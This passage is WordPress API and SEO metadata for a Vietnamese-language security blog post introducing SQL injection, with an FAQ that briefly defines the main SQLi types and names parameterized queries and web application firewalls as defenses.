securitybriefing\" \/>\n<meta property=\"og:description\" content=\"Learn the basics of SQL injection. 
what is SQL injection, how does it work, and what ways to protect your site from attacks.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/\" \/>\n<meta property=\"og:site_name\" content=\"Security Briefing\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-06T22:53:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\" \/>\n\t<meta property=\"og:image:width\" content=\"558\" \/>\n\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"security\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi\" \/>\n\t<meta name=\"twitter:data1\" content=\"security\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 ph\u00fat\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"},\"author\":{\"name\":\"security\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81\"},\"headline\":\"SQL Injection 101: What is SQLi and How to Prevent 
Attacks\",\"datePublished\":\"2022-08-06T22:53:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"},\"wordCount\":2130,\"publisher\":{\"@id\":\"https:\/\/securitybriefing.net\/#organization\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"articleSection\":[\"Security\"],\"inLanguage\":\"vi\"},{\"@type\":[\"WebPage\",\"FAQPage\"],\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\",\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\",\"name\":\"What is SQLi and How to Prevent Attacks | securitybriefing\",\"isPartOf\":{\"@id\":\"https:\/\/securitybriefing.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"datePublished\":\"2022-08-06T22:53:54+00:00\",\"description\":\"Learn the basics of SQL injection. 
what is SQL injection, how does it work, and what ways to protect your site from attacks.\",\"breadcrumb\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb\"},\"mainEntity\":[{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\"}],\"inLanguage\":\"vi\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"vi\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\",\"url\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"contentUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"width\":558,\"height\":500,\"caption\":\"sql 
injection\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/securitybriefing.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SQL Injection 101: What is SQLi and How to Prevent Attacks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/securitybriefing.net\/#website\",\"url\":\"https:\/\/securitybriefing.net\/\",\"name\":\"Security Briefing\",\"description\":\"Read cybersecurity news, online safety guides, cyber threat updates, and use free security tools from Security Briefing.\",\"publisher\":{\"@id\":\"https:\/\/securitybriefing.net\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/securitybriefing.net\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"vi\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/securitybriefing.net\/#organization\",\"name\":\"Security Briefing\",\"url\":\"https:\/\/securitybriefing.net\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"vi\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png\",\"contentUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png\",\"width\":256,\"height\":70,\"caption\":\"Security 
Briefing\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81\",\"name\":\"security\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"vi\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g\",\"caption\":\"security\"},\"description\":\"admin is a senior staff writer for Government Technology. She previously wrote for PYMNTS and The Bay State Banner, and holds a B.A. in creative writing from Carnegie Mellon. She\u2019s based outside Boston.\",\"sameAs\":[\"http:\/\/securitybriefing.net\"],\"url\":\"https:\/\/securitybriefing.net\/vi\/author\/security\/\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\",\"position\":1,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\",\"name\":\"What is the most common SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"In-band SQL injection is the most common type of SQL injection attack. 
It occurs when an attacker can use the same communication channel to deliver the payload and gather results.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\",\"position\":2,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\",\"name\":\"What is the best defense of SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"The best defense against SQL injection is to use parameterized queries. This type of query uses placeholder values for parameters, which are supplied at a later date. This method allows the database to identify between source code and information.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\",\"position\":3,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\",\"name\":\"How is SQL injection detected?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"SQL injection can be detected in several ways. One method is to use a web application firewall (WAF). A WAF is a piece of hardware or software that sits between a web application and the internet. 
It inspects traffic for malicious activity and can block SQL injection attacks.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\",\"position\":4,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\",\"name\":\"What is second-order SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Second-order SQL injection occurs when an attacker can inject a payload that is stored by the web application and then later executed. This type of attack is more difficult to achieve because the attacker must have a way to trigger the execution of the stored payload.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\",\"position\":5,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\",\"name\":\"What is blind SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Blind SQL injection is an attack where the attacker does not directly see the results of their payload. Instead, they must use true or false statements to infer information from the database. 
This type of attack is more challenging to execute but can be just as dangerous as other types of SQL injection.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\",\"position\":6,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\",\"name\":\"What is a stacked query?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"A stacked query is a type of SQL injection where the attacker uses multiple queries to extract information from the database. This type of attack is more challenging to execute but can be very dangerous if successful.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\",\"position\":7,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\",\"name\":\"What is an error-based SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Error-based SQL injection is an attack where the attacker uses database errors to infer information from the database. This attack is more challenging to execute but can be very dangerous if successful.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SQLi l\u00e0 g\u00ec v\u00e0 C\u00e1ch ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng | securitybriefing","description":"H\u1ecdc c\u00e1c ki\u1ebfn th\u1ee9c c\u01a1 b\u1ea3n v\u1ec1 SQL injection. 
SQL injection l\u00e0 g\u00ec, n\u00f3 ho\u1ea1t \u0111\u1ed9ng nh\u01b0 th\u1ebf n\u00e0o v\u00e0 nh\u1eefng c\u00e1ch n\u00e0o \u0111\u1ec3 b\u1ea3o v\u1ec7 trang web c\u1ee7a b\u1ea1n kh\u1ecfi c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/","og_locale":"vi_VN","og_type":"article","og_title":"What is SQLi and How to Prevent Attacks | securitybriefing","og_description":"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.","og_url":"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/","og_site_name":"Security Briefing","article_published_time":"2022-08-06T22:53:54+00:00","og_image":[{"width":558,"height":500,"url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","type":"image\/png"}],"author":"security","twitter_card":"summary_large_image","twitter_misc":{"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi":"security","\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"11 ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#article","isPartOf":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"},"author":{"name":"security","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81"},"headline":"SQL Injection 101: What is SQLi and How to Prevent 
Attacks","datePublished":"2022-08-06T22:53:54+00:00","mainEntityOfPage":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"},"wordCount":2130,"publisher":{"@id":"https:\/\/securitybriefing.net\/#organization"},"image":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","articleSection":["Security"],"inLanguage":"vi"},{"@type":["WebPage","FAQPage"],"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/","url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/","name":"SQLi l\u00e0 g\u00ec v\u00e0 C\u00e1ch ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng | securitybriefing","isPartOf":{"@id":"https:\/\/securitybriefing.net\/#website"},"primaryImageOfPage":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"image":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","datePublished":"2022-08-06T22:53:54+00:00","description":"H\u1ecdc c\u00e1c ki\u1ebfn th\u1ee9c c\u01a1 b\u1ea3n v\u1ec1 SQL injection. 
SQL injection l\u00e0 g\u00ec, n\u00f3 ho\u1ea1t \u0111\u1ed9ng nh\u01b0 th\u1ebf n\u00e0o v\u00e0 nh\u1eefng c\u00e1ch n\u00e0o \u0111\u1ec3 b\u1ea3o v\u1ec7 trang web c\u1ee7a b\u1ea1n kh\u1ecfi c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng.","breadcrumb":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb"},"mainEntity":[{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814"}],"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"]}]},{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage","url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","contentUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","width":558,"height":500,"caption":"sql 
injection"},{"@type":"BreadcrumbList","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/securitybriefing.net\/"},{"@type":"ListItem","position":2,"name":"SQL Injection 101: What is SQLi and How to Prevent Attacks"}]},{"@type":"WebSite","@id":"https:\/\/securitybriefing.net\/#website","url":"https:\/\/securitybriefing.net\/","name":"B\u00e1o C\u00e1o An Ninh","description":"Read cybersecurity news, online safety guides, cyber threat updates, and use free security tools from Security Briefing.","publisher":{"@id":"https:\/\/securitybriefing.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/securitybriefing.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"vi"},{"@type":"Organization","@id":"https:\/\/securitybriefing.net\/#organization","name":"B\u00e1o C\u00e1o An Ninh","url":"https:\/\/securitybriefing.net\/","logo":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/","url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png","contentUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png","width":256,"height":70,"caption":"Security Briefing"},"image":{"@id":"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81","name":"b\u1ea3o 
v\u1ec7","image":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g","caption":"security"},"description":"admin l\u00e0 m\u1ed9t bi\u00ean t\u1eadp vi\u00ean c\u1ea5p cao c\u1ee7a Government Technology. Tr\u01b0\u1edbc \u0111\u00e2y c\u00f4 \u0111\u00e3 vi\u1ebft cho PYMNTS v\u00e0 The Bay State Banner, v\u00e0 c\u00f3 b\u1eb1ng C\u1eed nh\u00e2n Ngh\u1ec7 thu\u1eadt s\u00e1ng t\u00e1c c\u1ee7a tr\u01b0\u1eddng Carnegie Mellon. C\u00f4 s\u1ed1ng \u1edf ngo\u1ea1i \u00f4 Boston.","sameAs":["http:\/\/securitybriefing.net"],"url":"https:\/\/securitybriefing.net\/vi\/author\/security\/"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348","position":1,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348","name":"SQL injection ph\u1ed5 bi\u1ebfn nh\u1ea5t l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"In-band SQL injection is the most common type of SQL injection attack. 
It occurs when an attacker can use the same communication channel to deliver the payload and gather results.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832","position":2,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832","name":"Ph\u00f2ng th\u1ee7 t\u1ed1t nh\u1ea5t ch\u1ed1ng l\u1ea1i SQL injection l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"The best defense against SQL injection is to use parameterized queries. This type of query uses placeholder values for parameters, which are supplied at a later date. This method allows the database to identify between source code and information.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670","position":3,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670","name":"SQL injection \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n nh\u01b0 th\u1ebf n\u00e0o?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"SQL injection can be detected in several ways. One method is to use a web application firewall (WAF). A WAF is a piece of hardware or software that sits between a web application and the internet. 
It inspects traffic for malicious activity and can block SQL injection attacks.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103","position":4,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103","name":"SQL injection th\u1ee9 c\u1ea5p l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Second-order SQL injection occurs when an attacker can inject a payload that is stored by the web application and then later executed. This type of attack is more difficult to achieve because the attacker must have a way to trigger the execution of the stored payload.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267","position":5,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267","name":"Blind SQL injection l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Blind SQL injection is an attack where the attacker does not directly see the results of their payload. Instead, they must use true or false statements to infer information from the database. 
This type of attack is more challenging to execute but can be just as dangerous as other types of SQL injection.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781","position":6,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781","name":"Truy v\u1ea5n x\u1ebfp ch\u1ed3ng l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"A stacked query is a type of SQL injection where the attacker uses multiple queries to extract information from the database. This type of attack is more challenging to execute but can be very dangerous if successful.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814","position":7,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814","name":"SQL injection d\u1ef1a tr\u00ean l\u1ed7i l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Error-based SQL injection is an attack where the attacker uses database errors to infer information from the database. 
This attack is more challenging to execute but can be very dangerous if successful.","inLanguage":"vi"},"inLanguage":"vi"}]}},"_links":{"self":[{"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/posts\/505","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/comments?post=505"}],"version-history":[{"count":0,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/posts\/505\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/media\/644"}],"wp:attachment":[{"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/media?parent=505"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/categories?post=505"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/tags?post=505"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}